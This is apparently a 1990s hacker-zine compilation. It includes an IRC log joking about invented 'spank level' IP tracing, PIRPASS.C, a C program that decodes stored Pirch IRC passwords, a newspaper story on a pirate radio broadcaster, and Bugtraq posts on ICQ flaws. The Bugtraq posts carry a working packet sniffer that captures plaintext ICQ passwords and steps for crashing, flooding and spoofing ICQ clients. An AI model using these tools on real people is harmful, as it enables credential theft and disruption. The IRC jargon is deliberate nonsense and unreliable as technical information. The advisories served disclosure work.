dimak, what's the ip? yeah. Tell us the ip and we'll help you out a little spanking is much easier with basic......using tools to enhace the spank teqnique is the only way AlphVers, X-Originating-IP: [128.252.61.5] you see b00ze's ip was 202.163.254.105 that's spank level 8 ain't it? dimak: that has a spank level of 1 because the first digit is 1 this may take a while after all dood spank level8?? oh hang on, the 3rd digit is 8 oh yeah. Got a bit confused there sorry. SPANK LEVEL 8!!! 
oh well fuck lemme get my spanker b00ze would've been easier to hack 'cause it was only a level 2 spank 202.163.254.105 you see spank level 2 but spank level 8!!! that's gonna be tricky dimak, are you sure that's correct? i can't spank the sequence out of it spank level 8 thats some 3331337 shiznit yes, i got from e-mail that was maild from Hotmail wow hotmail? uhoh so your familiar with the spank protocol? hotmail has it's own way of spanking *** guji has joined #hackphreak you'd need a hotmail decoder for it i got a message from hotmail, it has IP address in properties where I can get it? *** Tr|cky^ has joined #hackphreak yeah. Spank level 8 ips never change *** Tr|cky^ has left #hackphreak *** guji has left #hackphreak and the hotmail spank level 8 is even more difficult wait you need to do some pretty difficult BASIC coding to spank that one man there it is now those hotmail admins know how to spank think i got something here what is it I've never got a spank level 8 before washington university in st louis yeah I've never actually encountered a spank level 8 either or atleast, that's the last hop before the monkey puked ohhh dammit I hate premature termination i assume they own the entire spank range The problem is that he probley bounced, 'cause you only get spank level 8 for companies and stuff if they do, that's where it came from AV, How did you get that? the exact name of the location? I thoght it should have been geographical not home users dimak, by spanking the monkey of course it gave you the university name? *** Odyss3us has joined #hackphreak yup it looks like it came from somewhere on the east side of campus not sure could be south-east too well the monkey spank protocol is quite wily it can get kinda hairy if your not familiar with it's proper usage...I like to use standard spank nerd, come on standard spank sucks ok ok *** ratshat has joined #hackphreak call me old fasion I is greate. 
thank you very much, how can you tell me this, it is amazing, I hardly believe the ip can get such detailed info the thing is that hotmail spank is more secure you won't even get an address with a standard spank on an arp oh yeah by far and the monkey that hotmail spank uses for level 8 spank is more prone to 'puking' AlphaVers, do you have a kind of database for IP codes? yeah correct that premature termination is a bitch dimak, it's dynamicly created everytime i spank if i spank you for instance, it would create a database with info on you where is the initial information from? i forgot my password for a excel file anyone know a way around? but unauthorized spanking is kinda illegal I'd have to say that theis guy probably bounced 'cause a level 8 spank is not usually seen with a home user. He must've gone through an organisation, or that could just be the hotmail spank security why illegal? *** HuSoft has quit IRC (BrB..._) *** [tefx] has joined #hackphreak if would spank a cia agent for instance i'd be able to get all info on him i want they don't like that but they use standard spank so what do they expect? it's only legal on ip's in ranges below 200. <[tefx]> hehe it's like using hotmail you know everyone can read your mail, but if they do you won't like it well, but you should know he is the agent, but you do not know. if you know I might gess you are the agent too, and the legal for you is not determined. :) *** Odyss3us is now known as Ody|away AlphaVers, who sets the rules on spanking? the monkey of course trust me, spanking on ip's above the 200. range is illegal for me <[tefx]> hymm dimak, nsa does the monkey sets the rules lmao the monkey's with the nsa <[tefx]> i think theres different ranges in th uk. not much though but I heard a spank session is hard to detect..........do you have to use some sort of spoofing method to have a truly successful spank? what is above 200? yeah. 
In the UK you can only spank up to level 4 ned yes, spank soofing really hard to do though nerd even so I have heard what is above 200? <[tefx]> walrus. in scotland it goes up to 8, but in amsterdam, they let you smoke pot while you spank thats the critical zone *** HuSoft has joined #hackphreak what about wales? like you're ip: 212.48.192.150, that would be illegal <[tefx]> hmm hi again people! to spank I think spanking has been outlawed there <[tefx]> as they have lega sheep spanking , i recon about a 6 <[tefx]> nah yeah. Sheep spanking is on its way out <[tefx]> only sheep spanking is legal, none of this monkey crap hotmail spank is the new protocol sheep spanking was used on arpanet <[tefx]> SSP/IP i think milnet still uses sheep spank AlphaVers, is it possible to prevent spanking of IP, for instance if I send e-mail and do not people to spank it? <[tefx]> sheep spanking protocoll , intyercourse protocoll hotmail spank is fast becoming the global monkey spanking standard <[tefx]> ugh dimak, that would get the monkey pissed <[tefx]> what about spanking penguins ? so it is possible, is it? I heard the aol spank was pretty 1337 I didn't think penguin spanking had been introduced yet <[tefx]> yeah, its a new nmut upgrade <[tefx]> nut i mean walrus, penguin spanking is still an experiment hmm...thats far out shit tho <[tefx]> its in beta test * AlphaVers hopes deamon spanking will be the next standard <[tefx]> yeah, <[tefx]> aint it daemon >?< bsdi got pissed over that so they made it deamon <[tefx]> your telling me as far as I know the pp (penguin protocol) won't be introduced until IPv6 is introduced <[tefx]> argh. 
<[tefx]> oh, well, there still hope then it will become standard we all know dsp (deamon spanking protocol) will kick pp's ass and the monkey spanking and hotmail spanking will bothe be fazed out <[tefx]> apart from the spanking protocolls there the feet sub set : then theres ftp : foot tapping ptotocoll, http : hyper toe tapping protocoll, yeh no shit <[tefx]> i still think pengiun still has a chance <[tefx]> hmm. <[tefx]> i guess we'll just have to wait and see dimak: do you still want to know how to avoid spanking? <[tefx]> yeah. avoid the leather whip protocoll LWP yes dimak, log that, jp won't tell you how to avoid it right. Go on yahoo, and search for info on anti spanking techniques <[tefx]> heh yahoo is the best one for this <[tefx]> and put in NO porn in the search as well <[tefx]> i prefer altavista 'cause some twisted people will associate it with sex <[tefx]> i though yahoo removed the spanking category ? just be sure you don't get yahoo spanking, that hasn't been used since '91 tefx, the put it back too much compliants popular demand <[tefx]> good. anyway ... <[tefx]> not suprised <[tefx]> i was pissedd of when it left you need to find a page that gives you an anti spank script jp threatened to sue them if they didn'tput it back and you send your email through the script and then nobody can spank your ip <[tefx]> i rmeber when hotmail spanking and mircosoft spanking were totally different, bemore the intercourse, now its passport spanking 'cause its hidden dimak, what os are you on? right to smite a spank you must cause the incoming spank packet to be intercepted by some medium .........it should kinda absorb the spank packet do you want to aviod hotmail spank, or regular spank? 
w95 damn if you were on bsd i'd have one for you <[tefx]> uh-oh <[tefx]> theres but spanking youve got to avoid aswell i wrote one a while ago working to get it ready for pp and dsp but trying to protect yourself from everytype of spank is ludicrous <[tefx]> i had a spanking setector, but it needed a few other files, an anti-hotmail spank script for BSD? Did you write that in BASIC? alpha, what is bsd? walrus, yeah <[tefx]> when you got spanked on win95, it would say Invalid page fault gbase hever heard <[tefx]> a general protection fault, is a time delayed spank yeah of course newer releases of Win 98 has been patched against hotmail spanks above level 5 every time you get one you got spanked <[tefx]> quite nasty Does anybody know about Win NT spanking? walrus, it'll crash above level 7 thats a sensitive area I've not had time to get any info on spaking in NT been fixed in service pack 5 i think does it depend on what SP (spank pack) you've got <[tefx]> heh there l0pht spank <[tefx]> dont forget that no I think service pack five still had some errors handling the level 8 spank wlarus, yeah, sp 3 should do the trick poeple oftenget service packs and spank packs confused be carefull though, your spank black will stop working You need to modify your registry for spank pack 4 to work don't you? shit of course what was I thinking...... yeah add an extra spank key yeah I wrote a BASIC script for that nerd, cool <[tefx]> what about pgp spanking but some spank packets can still get around that one. For istance the beta penguin spanks can already get through that tefx, don't go there man you never know who's listening in here shit man why the fuck did you mention that? 
It'd fall on deaf ears you know how the gov feels about pgp spanking <[tefx]> ah true mostof the lamerz in here don't even know the difference between a sheep spank and a standard monkey spank I don't think we should talk about the pgp spank dimak, forget about pgp spanking I am feeling uncomfortable <[tefx]> we could always talk about the clipper spanking controversy tefx, don't I've not heard about that one <[tefx]> oh i got raided for telling ppl about that <[tefx]> ill lay off the cryto spanking dimak: you found an antispank script yet? they took my hardware spank block shit man still trying on yahoo <[tefx]> oh god. took me 2 years to build that thing <[tefx]> thank god its not so bad here in the uk correct parts are very hard to find I'm using a software block to stop hotmail spanks above level 4, 'cause hotmail spank is the most common one <[tefx]> as long as they dont take my spanking board tefx, if you don't tell anyone you have it, you're ok <[tefx]> spanking board, what spanking board ;) I find that a software block can absorb most of the spank packets caused by 'puking' i found textbook on http://lib.daemon.am/Books/Hackers_Guide/ch26/ch26.htm <[tefx]> no <[tefx]> thats nsa. <[tefx]> its the nsa yeah. 
But the monkey is in the NSA remember <[tefx]> its instructions on how to let them spank you AV was saying earlier stay away from that it could be a 'spank trojan' ohhh nasty like monkey's orifice dimak, you should get a spank scanner too right the monkeys orifice is like a huge hole man......fucking insanity <[tefx]> then thers pmonkey orifice 2k its not that great though brb <[tefx]> then thers hotmail-bus gotta set up some phone spanking stuff soanking the phonelines is some next level shit whoa spanking not the lines, cell phones <[tefx]> whoo prepay mainly <[tefx]> then threse pager spanking right what was I thinking obviously I wasn't * walrus is off bye all guys, it is impossible ot seearch the stuff via yahoo **********This is where tefx's log takes over********** [12:34] <[tefx]> cyas walrus [12:34] *** Parts: walrus (walrus@userb402.uk.uudial.com) [12:34] if you spank a nokia 6110 it'll give you it's card [12:35] <[tefx]> true [12:35] <[tefx]> then theres chocking techniques. [12:35] <[tefx]> chocking the chicken often works [12:35] it gives out shit [12:35] I find the choke protocol very useful [12:35] <[tefx]> or the bash [12:35] <[tefx]> bash:~>bishop [12:35] <[tefx]> bashing bishop [12:35] don't teach him how to choke man [12:36] it allowss better control of the whole spank [12:36] ok ok [12:36] <[tefx]> acces found, level 4, using monkey.... 
ok [12:36] he ain't ready [12:36] <[tefx]> true [12:36] let him fogure out the simple monkey first [12:36] <[tefx]> heh [12:36] <[tefx]> that can take years [12:36] figure even [12:36] tefx, true [12:37] <[tefx]> or minutes [12:37] right.....he has to start with the monkey spank or he'll go nowhere fast [12:37] took me over a year to get the monkey too [12:37] <[tefx]> if you can do seemore more also know as C++ [12:37] <[tefx]> it takes minutes [12:37] ok, bye all, thank AlphaVers very much for help [12:37] yeah but once you have the monkey the rest is pretty much natural [12:37] <[tefx]> yeah [12:38] you're welcome [12:38] bye [12:38] *** Parts: dimak (dimakworld@ppp-150.pool-113.spbnit.ru) [12:38] later [12:38] <[tefx]> heh [12:38] brb I am gonna try this new spank technique so I might be gone for awhile [12:39] <[tefx]> heh [12:40] <[tefx]> who else wnats to know about spanking ? [12:42] well I am back.... [12:42] that spanking method was quite impressive [12:42] I think it was written in hypercard [12:42] partially [12:43] <[tefx]> heh, mine was done in flash [12:43] some was written in cobol as well [12:43] wow [12:43] depends on the os [12:43] *** Joins: d5 (~d5@wind.angen.net) [12:43] I heard of these hypercard spanks so I had to try it out..... [12:44] hello [12:44] they terminate twice as fast as your standard spank [12:44] I like to reffer to it as the hyperspank [12:45] *** Quits: d5 (spank-lined) [12:45] cool [12:45] <[tefx]> uh oh [12:45] <[tefx]> somebody tried a spank [12:45] NO WAY [12:45] <[tefx]> [12:45] *** Quits: d5 (spank-lined) [12:45] you were spanked by a foriegn host? [12:45] <[tefx]> on undernet. ;) [12:46] <[tefx]> silly boy, either that or an operator spanked him [12:46] for his sake i hope it was an op [12:46] *** Joins: x-deth (~r00t@ppp664.ath.forthnet.gr) [12:46] hi [12:46] wellcome [12:46] howdyz x-deth [12:47] *** Joins: d5 (~d5@wind.angen.net) [12:47] sup? 
=) [12:47] i was just tryping /spank in mirc and i got a message froma n op ? what happened [12:47] you missed out on some good spaning x-deth [12:47] well i better head out..........but ehm remember not to forget what we sed here cose it was very important [12:48] why doesnt mirc spanking work on undernet [12:48] may the spank protocol be with you [12:48] *** Quits: nerd (Yadayadayada - Ed) [12:48] nerd, go spank 'm [12:49] *** Quits: d5 (Spank Lined - [Undernet.org] - I told you once, i don't like spanmks) [12:55] <[tefx]> so any more spanking questions [13:19] whats uid and gid ? [13:19] uid=0 (root) [13:19] gid=0 (root) [13:19] ? [13:20] tek, yeah [13:20] gid 0 depends on the os [13:20] it's the group root is in [13:20] os is rh 5.1 [13:20] 2.0.34 [13:20] hmm [13:21] oki [13:32] * [tefx] is off

/*****************************************************************
 * PIRPASS.C by EXE-Gency
 *
 * A program to search the current directory for any Pirch
 * passwords. (Pirch is a program that can be used for accessing
 * IRC.) The password is normally stored in PIRCH98.INI, but PIRPASS
 * supports wildcards, so you can use PIRPASS *.INI as well as
 * PIRPASS PIRCH98.INI. The decryption algorithm is taken from
 * a file by Daemon0/Underground Periodical.
 *
 * If you want to compile the source code yourself you'll need a
 * copy of DJGPP:
 *
 *     gcc -o PIRPASS.EXE PIRPASS.C
 *
 *****************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <dir.h>        /* DJGPP: findfirst(), findnext(), struct ffblk */

int main(int Argc, char *Argv[])
{
    FILE *PasswordFile;
    struct ffblk FileSearch;
    unsigned int SearchResult, SearchCount;
    char String[100], *Ptr;

    if(Argc!=2)
    {
        printf("PIRPASS v1.0 by EXE-Gency\n");
        printf("Syntax: PIRPASS [filename]\n");
        printf("E.G: PIRPASS PIRCH98.INI\n");
        exit(1);
    }
    printf("PIRPASS v1.0 by EXE-Gency. Program to get pirch password.\n");

    SearchCount=0;
    SearchResult=findfirst(Argv[1], &FileSearch, 0);
    while(!SearchResult)
    {
        SearchCount++;
        if((PasswordFile=fopen(FileSearch.ff_name, "r"))==NULL)
        {
            printf("Cannot open file [%s] for reading!\n", FileSearch.ff_name);
        }
        else
        {
            /* Read line by line. Testing fgets() rather than feof() means
               the last line is not scanned a second time at end of file. */
            while(fgets(String, sizeof(String), PasswordFile))
            {
                Ptr=strstr(String, "Pw=");
                if(Ptr)
                {
                    Ptr+=3;
                    printf("Found password [");
                    /* Pirch stores each password byte with 127 added, so
                       subtract it back off. Stop at end of line or of the
                       buffer, so a final line without a newline is safe. */
                    while(*Ptr && *Ptr!='\r' && *Ptr!='\n')
                    {
                        printf("%c", (*Ptr)-127);
                        Ptr++;
                    }
                    printf("] in file [%s]\n", FileSearch.ff_name);
                }
            }
            fclose(PasswordFile);
        }
        SearchResult=findnext(&FileSearch);
    }
    printf("Finished! %u files scanned.\n", SearchCount);
    return 0;
}

Mr. Brewer the Pirate Doesn't Rule Waves, He Just Makes Them

Illegal Broadcaster Has Taunted Government for 2 Years; FCC Man: "I'll Nail Him"

By Bruce Orwall
Staff Reporter of The Wall Street Journal

Temple Terrace, Fla. - Radio station 102.1 FM emanates from this Tampa suburb with a crisp, clear signal that carries its biker rock and raunchy talk as far as 20 miles. Its largest audience, bikers and college students, likes the station just fine, enjoying the sex-charged banter, the oddball music and the attitude against authority.

It's the authorities who have a problem with 102.1 FM: The Federal Communications Commission says the station, broadcasting out of Doug Brewer's converted garage, is illegal. Mr. Brewer's operation is one of hundreds of unlicensed, or pirate, stations in the U.S., which is in the midst of an unprecedented boom in illegal broadcasting.

Mr. Brewer, long-haired, beefy and a self-described redneck biker, has emerged as one of the pirate movement's premier outlaws, mostly because he has thwarted FCC efforts to shut him down for almost two years. This despite the fact that Mr. Brewer, who calls his station "Tampa's Party Pirate," has made himself an easy target.
It is no secret that he broadcasts from his garage, where compact disks are strewn indiscriminately and the walls are lined with biker-babe pinups and pictures of stock-car racing stars. "It's ongoing, it's visible, and it just plain rocks," brags Mr. Brewer, who cultivates an on-air image of a rough-and-tumble biker and isn't averse to self-aggrandizement off the air. His promotional T-shirts boast, "License? We don't need no stinking license" - though truth be told, Mr. Brewer tried to get a license and was turned down.

The FCC has been hard-pressed to keep up with the pirate proliferation and has successfully shut down just a few of the multiplying radio bandits. The commission first acted against Tampa's Party Pirate in early 1996, when an anonymous tip led to a written notice warning Mr. Brewer that the station "creates a definite danger of interference to important radio communication and impedes the orderly distribution and protection of the spectrum." A few months later, a licensed rock station in nearby Sarasota, WHFT, broadcasting a hair's breadth away on the dial at 102.5, complained to the FCC that Mr. Brewer's station was causing confusion among its listeners.

Fines and Seizures

The FCC typically uses fines and equipment seizures to deal with such situations. The agency has threatened Mr. Brewer with both and even issued a $1,000 fine, which has gone unpaid. But Mr. Brewer has stalled the enforcement process by engaging it head on. Unlike most pirates, he has applied for a legitimate license and has also sought "special temporary authority" to remain on the air while his situation is under review. Both requests have been denied, but the maneuvering has bought him time and kept the government from seizing his gear.

Mr. Brewer has made a few guerrilla moves to keep the FCC at bay. When agents first appeared at his house in January 1996, he wasn't home; he claims they badgered his wife and inspected his station while it was fully powered.
To make sure that doesn't happen again, Mr. Brewer has installed a hidden switch in the laundry room that allows his wife to power the station down from 125 watts to about 10 with a single flick if she sees the FCC prowling the neighborhood. This past Halloween, when FCC agents roamed the neighborhood measuring the strength of the pirate station's signal, Mr. Brewer caught them by surprise, driving up to them in a black van with his radio station logo on the side. Yelling "Smile!" he took the agents' picture and posted it on his Internet site.

There are signs the FCC is growing restless. Ralph Barlow, district director of the Tampa field office, won't discuss the specifics of the case against the 43-year-old Mr. Brewer, but concedes that the taunts are "not good" for his agents. The matter is in the hands of prosecutors in the U.S. attorney's office in Tampa, and the FCC is pressing for action. "This guy is going off the deep end because he's been getting away with it for so long," Mr. Barlow says. "Sooner or later I'll nail him."

Those kinds of threats don't mean much to Mr. Brewer, who has dabbled in electronics and rebellion for most of his life. Thrown out of a Tampa technical high school, he landed on his feet as a phone installer, and later as the operator of an electronics store. In his free time, he became immersed in the subcultures of ham radio, Harley-Davidsons and rock 'n' roll. A few years ago, he fought the local government here for the right to erect a 150-foot ham tower over his home. After winning, Mr. Brewer took to lighting the tower like a huge Christmas tree each holiday season. To entertain crowds that drove by, he put up a tiny FM transmitter and played Christmas music on an unused portion of the band. The signal carried only a few blocks.

Growing ambitious, Mr. Brewer pumped up his operation in 1995, broadcasting all day, every day, and adding wattage. His harsh programming didn't get much of a reaction at first.
"One of the big mistakes I made was having eight straight hours of death metal," he says. With the help of his wife, Karen, however, he built an operation that resembles a real radio station, albeit a ragged one. He has advertisers of a sort, and receives promotional compact disks from some record companies. His black van can broadcast live from local bars or businesses.

Although the station's signal is clean, its programming swerves from adventurous to amateurish. On a recent night, a disk jockey named Murph misidentified the performer of a song he played and was taken to task by a listener. Mr. Brewer himself goes on the air three times a week, taking full advantage of the fact that, without a license, he is beyond the reach of the FCC's restrictions on foul language.

The sexual chitchat has earned Mr. Brewer a rising profile and a bad-boy notoriety he treasures. An alternative newspaper recently crowned him "Best Pig of the Airwaves" in Tampa. Says 20-year-old listener Chas Goldman of Tampa: "I know it's not really legal, but I don't know, man. . . . It's a really cool thing to do."

Advertisers on 102.1 FM range from strip clubs to record stores. Mr. Brewer says they provide him with about $1,000 a month in revenue. For just $100 a month, he mentions their businesses several times a day. (He makes a living running an electronics store, which makes some of its income selling FM transmitter kits on the Internet.) Advertiser Scott Harris, owner of Disc-Go-Round, a used CD store, says customers frequently mention the store's spots and tell him, "We're glad you guys are on there because we believe in it."

Such sentiments obviously aren't shared by licensed broadcasters. Jeff Daumann, executive vice president and general counsel of the National Association of Broadcasters, says his group's main concern is that the FCC is slowly losing its ability to bring order to the radio dial, and the group is also worried about interference with legitimate stations.
"It's not a nuisance," Mr. Daumann says. "It's a serious problem."

ICQ so-called protocol

Description: The ICQ protocol is ridiculously simplistic and is riddled with security holes. So is the ICQ software. So ICQ users can be spoofed, have their machine crashed, or have evil haxxors run arbitrary code on their boxes. Geez, these poor users might as well run Internet Explorer!
Author: Alan Cox
Compromise: Spoof, Crash, or exploit the buffer overflow to run arbitrary code
Vulnerable Systems: Mostly Windows boxes where the user is running ICQ
Date: 14 December 1997

Date: Sun, 14 Dec 1997 14:20:27 GMT
From: Alan Cox
To: BUGTRAQ@NETSPACE.ORG
Subject: Vulnerabilities in ICQ

/*
 *  This is a little toy to demo the weaknesses in the Mirabilis ICQ system.
 *  There are two major problems with the ICQ protocol clearly visible. As
 *  it's an unpublished proprietary system we can assume there may well be
 *  far more lurking. It's also too apparent why they don't publish it - my
 *  guess has to be "embarrassment factor".
 *
 *  The first flaw is plain dumb. They send plaintext authentication. Not
 *  only that, they send it once per session.
 *
 *  The second flaw is that they use easily guessable sequence numbers -
 *  starting from 0 each user session, they use UDP and, to make life even
 *  easier, their query service will tell you exactly what IP address to
 *  spoof as source when faking them. So you can find someone is on, find
 *  their IP and spoof sequences 0->100 with a fair bet that somewhere
 *  before the 100th fake message you'll get several hits and spoof
 *  messages. If not you can winnuke the victim so he'll be back on a low
 *  sequence number 8)
 *
 *  Let us hope the proposed Rendezvous Protocol that is supposed to become
 *  an internet draft is better designed and that the ICQ people switch to
 *  it. There really is no excuse for using crude plaintext and simplistic
 *  sequence spaces when five minutes' thought could have resolved almost
 *  every weakness except password change without US export controlled
 *  crypto.
 *
 *  I've enclosed a demo that does password sniffing for ICQ. It requires
 *  that you can work out how to set it up, and it doesn't include spoofing
 *  code.
 *
 *  Alan
 */

/*
 *  Snoop ICQ traffic for a set host. Shows how simplistic ICQ is and
 *  how easy it is to snoop it.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <net/if.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <arpa/inet.h>
#include <linux/if_ether.h>

/*
 *  PUT THE IP ADDRESS OF THE CLIENT TO SNOOP HERE OR IT WONT WORK
 */

#define MY_CLIENT_TO_WATCH  0x7F000001

/* Raw link-layer socket (Linux 2.0 SOCK_PACKET) that sees every frame */
static int create_socket(void)
{
    int s=socket(AF_INET, SOCK_PACKET, htons(ETH_P_ALL));
    if(s==-1)
    {
        perror("socket");
        exit(1);
    }
    return s;
}

static void close_socket(int s)
{
    close(s);
}

/* Switch promiscuous mode on or off for the named interface */
static void promiscuous(int s, char *iface, int onoff)
{
    struct ifreq ifr;
    strcpy(ifr.ifr_name, iface);
    if(ioctl(s, SIOCGIFFLAGS, &ifr)==-1)
    {
        perror("SIOCGIFFLAGS");
        exit(1);
    }
    strcpy(ifr.ifr_name, iface);
    if(onoff)
        ifr.ifr_flags|=IFF_PROMISC;
    else
        ifr.ifr_flags&=~IFF_PROMISC;
    if(ioctl(s, SIOCSIFFLAGS, &ifr)==-1)
    {
        perror("SIOCSIFFLAGS");
        exit(1);
    }
}

/* Ethernet type field 0x0800 = IP */
static __inline__ int ip_p(unsigned char *packet, int len)
{
    if(packet[12]==0x08 && packet[13]==0x00)
        return 1;
    return 0;
}

/* Wire layouts are little-endian and assume a 32-bit long (i386) */

struct icqhdr
{
    unsigned char version[2] __attribute((packed));   /* ?? */
    unsigned short command __attribute((packed));
    unsigned short sequence __attribute((packed));
    unsigned long uid __attribute((packed));
    unsigned char data[0];
};

struct icqack
{
    unsigned char version[2] __attribute((packed));   /* ?? */
    unsigned short result __attribute((packed));
    unsigned short sequence __attribute((packed));
    unsigned char data[0];
};

struct icqstring
{
    unsigned short len;     /* counts the trailing NUL */
    char data[0];
};

struct icqlogin
{
    struct icqhdr hdr __attribute((packed));
    unsigned long dunno __attribute((packed));        /* 000006FE.L */
    unsigned short pw_len __attribute((packed));
    unsigned char pw_data[11] __attribute((packed));  /* plaintext password */
    struct in_addr addr __attribute((packed));
    /* Rest is a mystery right now */
    /* 0.L */
    /* 2.L */
    /* 0000004C, 00000000 */
    /* 00 78 */
};

static void print_icq_string(struct icqstring *s)
{
    fwrite(s->data, s->len-1, 1, stdout);
}

/*
 *  Scan a packet for clues
 */

static int process_packet(struct sockaddr *sa, unsigned char *packet, int len)
{
    int i;
    int lv;
    int d=0;
    static long num=0;
    struct iphdr *iph;
    struct udphdr *udphdr;

    if(strcmp(sa->sa_data,"eth0"))
        return 0;       /* Wrong port */
    if(!ip_p(packet, len))
        return 0;
    iph=(struct iphdr *)(packet+14);
    udphdr=(struct udphdr *)(iph+1);    /* assume no options */
    lv=ntohs(udphdr->len);
    if( udphdr->source !=htons(4000) && udphdr->dest!=htons(4000))
    {
        return 0;
    }
/*  printf("packet %d \r", ++num);*/
    if(iph->saddr==htonl(MY_CLIENT_TO_WATCH))
    {
        printf("To Server: %d bytes\n", lv);
    }
    else if(iph->daddr==htonl(MY_CLIENT_TO_WATCH))
    {
        printf("From Server: %d bytes\n", lv);
        d=1;
    }
    else
        return 0;
    i=14+sizeof(struct iphdr);
    if(len-i>lv)
        len=i+lv;
    i+=sizeof(struct udphdr);
/*  printf("UDP size %d\n",i);*/
    if(i>=sizeof(struct icqhdr)+sizeof(struct udphdr))
    {
        struct icqhdr *p=(struct icqhdr *)(udphdr+1);
        if(d==0)
        {
            /* Client -> server commands */
            printf("From %ld\n",p->uid);
            printf("Version: %d.%d\nCommand ", p->version[1], p->version[0]);
            switch(p->command)
            {
                case 0x000A:
                    printf("Ack");
                    break;
                case 0x03E8:
                {
                    struct icqlogin *il=(struct icqlogin *)p;
                    printf("Login Password ");
                    print_icq_string((struct icqstring *)&il->pw_len);
                    printf(" IP %s", inet_ntoa(il->addr));
                    break;
                }
#if 0
                case 0x0x??
                {
                    struct in_addr v=*(struct in_addr *)p->data;
                    printf("Ping %s", inet_ntoa(v));
                    break;
                }
#endif
                case 0x409:
                {
                    printf("Ping");
                    break;
                }
                case 0x0438:
                {
                    struct icqstring *s=(struct icqstring *)p->data;
                    printf("Disconnect (");
                    print_icq_string(s);
                    printf(")");
                    break;
                }
                case 0x0456:
                {
                    /* data +4,5 is always 0100 */
                    struct icqstring *s=(struct icqstring *)(p->data+6);
                    printf("Message to %ld ", *((long *)p->data));
                    print_icq_string(s);
                    break;
                }
                case 0x0460:
                {
                    printf("Information %d on ID %ld",
                        *((short *)p->data),
                        *((long *)(p->data+2))
                    );
                    break;
                }
                case 0x046A:
                {
                    printf("Information_2 %d on ID %ld",
                        *((short *)p->data),
                        *((long *)(p->data+2))
                    );
                    break;
                }
                case 0x04D8:
                {
                    printf("Status ");
                    switch(*((long *)p->data))
                    {
                        case 0x00:
                            printf("[Away 0]");
                            break;
                        case 0x01:
                            printf("[Away 1]");
                            break;
                        case 0x10:
                            printf("[DND 0]");
                            break;
                        case 0x11:
                            printf("[DND 1]");
                            break;
                        default:
                            printf("%04lX", *((long *)p->data));
                    }
                    break;
                }
                default:
                    printf("%04X", p->command);
            }
            if(p->sequence)
                printf("\nSequence %d\n", p->sequence);
            else
                printf("\n");
        }
    }
    if(i>=sizeof(struct icqack)+sizeof(struct udphdr))
    {
        struct icqack *p=(struct icqack *)(udphdr+1);
        if(d==1)
        {
            /* Server -> client replies */
            printf("Version: %d.%d\nReply ", p->version[1], p->version[0]);
            switch(p->result)
            {
                case 0x000A:
                    printf("Ack");
                    break;
                case 0x00E6:
                    printf("Away Reply ");
                    printf("for %ld", *((long *)p->data));
                    break;
                case 0x0118:
                {
                    struct icqstring *is;
                    printf("InfoID %d\n", *((short *)p->data));
                    printf("ICQ ID %ld\n", *((long *)(p->data+2)));
                    /* Five consecutive icqstrings: nick, first name,
                       last name, e-mail, info */
                    is=(struct icqstring *)(p->data+6);
                    printf("Nick ");
                    print_icq_string(is);
                    is=(struct icqstring *)(((char *)is)+is->len+2);
                    printf("\nName ");
                    print_icq_string(is);
                    is=(struct icqstring *)(((char *)is)+is->len+2);
                    printf(" ");
                    print_icq_string(is);
                    is=(struct icqstring *)(((char *)is)+is->len+2);
                    printf("\nEMail ");
                    print_icq_string(is);
                    is=(struct icqstring *)(((char *)is)+is->len+2);
                    printf("\nInfo ");
                    print_icq_string(is);
                    break;
                }
                default:
                    printf("%04X", p->result);
            }
            if(p->sequence)
                printf("\nSequence %d\n",
p->sequence); else printf("\n"); } } while(i=32 && c< 127) printf("%c", c); else printf("."); } printf("\n"); i+=8; } printf("\n"); fflush(stdout); return 0; } int main(int argc, char *argv[]) { int s; unsigned char buf[1600]; struct sockaddr sa; int salen; int len; s=create_socket(); promiscuous(s, "eth0", 1); while(1) { salen=sizeof(sa); if((len=recvfrom(s, (char *)buf, 1600, 0, &sa, &salen))==-1) { perror("recvfrom"); close_socket(s); exit(1); } process_packet(&sa, buf,len); } printf("An error has occured.\n"); close_socket(s); exit(0); } Date: Sun, 14 Dec 1997 21:17:14 -0500 From: Seth McGann To: BUGTRAQ@NETSPACE.ORG Subject: Re: Vulnerabilities in ICQ At 14:20 12/14/97 GMT, you wrote: The Client-To-Client Protocol used by ICQ is even worse. It does no authentication of any kind and places all trust in the client. Spoofing messages from arbitrary ICQ users is easy, as is sending file and chat requests. Even worse, if the client gets anything it doesn't expect it crashes(!) sometimes taking Windows with it. There is also no flood protection and packet replay is possible. A few thousand messages will slow my P166 to a crawl. The only good thing ICQ did was pick a different port number for each session (well, not really its usually around 1024 as windows seems to allocate port numbers in order.) So, an attack would go as follows: 1. Port scan the target IP looking form 1024-2000 or so. 2. Send some random data to crash it. Using netcat is good for this. (or) 3. Take a valid ICQ message and resend it a million times. (or) 4. Take a valid ICQ message and change the User Identification Numbers. (or) 5. Be creative :) To reverse engineer the protocol, simply study the results of different ICQ activities with a sniffer or some type of Winsock watcher. I have figured out quite a bit about the protocol and will release a more formal writeup soon. Anyone with a few hours should be able to writeup a suitable client message spoofer. 
I am writing this as I have been exploiting these vulnerabilities for quite some time and I haven't seen anything about this on usenet or the mailing lists. As an example, I have provided the transcript of a message. This is an example of a simple message (there are many other types of traffic) of "12345" from UIN 3399052:

>> 0000: 2D 00                       <- Prefix (if this is wrong bad things happen)
>> 0000: 8C DD 33 00 02 00 EE 07 00 00 8C DD 33 00 01 00
>> 0010: 06 00 31 32 33 34 35 00 82 D7 F3 20 82 D7 F3 20
>> 0020: 09 04 00 00 04 00 00 10 01 ED FF FF FF

<< 0000: 28 00                       <- Post fix and ACK
<< 0000: 5D 29 35 00 02 00 DA 07 00 00 5D 29 35 00 01 00
<< 0010: 01 00 00 82 D7 F3 25 82 D7 F3 25 22 07 00 00 04
<< 0020: 00 00 00 00 ED FF FF FF

Simply send this a lot for a flood using netcat (ignoring the responses of course). I wrote a few simple exploits, but they used the socket faq library and seem redundant at this point, so I leave exploitation as an exercise to the reader.

Seth M. McGann / smm@wpi.edu          "Security is making it
http://www.wpi.edu/~smm                to the bathroom in time."
KeyID: 1024/2048/5FC59C0A
Fingerprint F315 1C37 CF3C 3612 3B28 BC84 C430 BC22 5FC5 9C0A

Date: Tue, 16 Dec 1997 20:20:41 -0300
From: Solar Designer
To: BUGTRAQ@NETSPACE.ORG
Subject: Re: Vulnerabilities in ICQ

Hello,

> The Client-To-Client Protocol used by ICQ is even worse. It does no
> authentication of any kind and places all trust in the client. Spoofing
